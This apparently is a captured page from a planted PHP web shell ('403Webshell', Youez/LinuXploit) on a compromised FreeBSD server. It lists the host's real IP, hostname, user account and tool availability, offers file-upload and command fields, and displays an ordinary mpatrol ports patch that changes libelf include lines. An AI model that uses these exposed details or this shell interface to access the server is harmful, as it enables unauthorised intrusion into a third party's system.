403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/devel/mpatrol/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/devel/mpatrol/files/patch-..__..__src__symbol.c
--- ../../src/symbol.c	2003/07/12 11:33:10	1.1
+++ ../../src/symbol.c	2003/07/12 11:33:29
@@ -72,7 +72,7 @@
 #include <ldfcn.h>
 #endif /* SYSTEM */
 #elif FORMAT == FORMAT_ELF32 || FORMAT == FORMAT_ELF64
-#include <libelf.h>
+#include <libelf/libelf.h>
 #elif FORMAT == FORMAT_BFD
 #include <bfd.h>
 #endif /* FORMAT */
@@ -113,7 +113,7 @@
  * symbols from the object files and libraries.  However, we still need the ELF
  * definitions for reading the internal structures of the dynamic linker.
  */
-#include <elf.h>
+/*#include <elf.h>*/
 #elif DYNLINK == DYNLINK_WINDOWS
 /* We use the imagehlp library on Windows platforms to obtain information about
  * the symbols loaded from third-party and system DLLs.  We can also use it to

Youez - 2016 - github.com/yon3zu
LinuXploit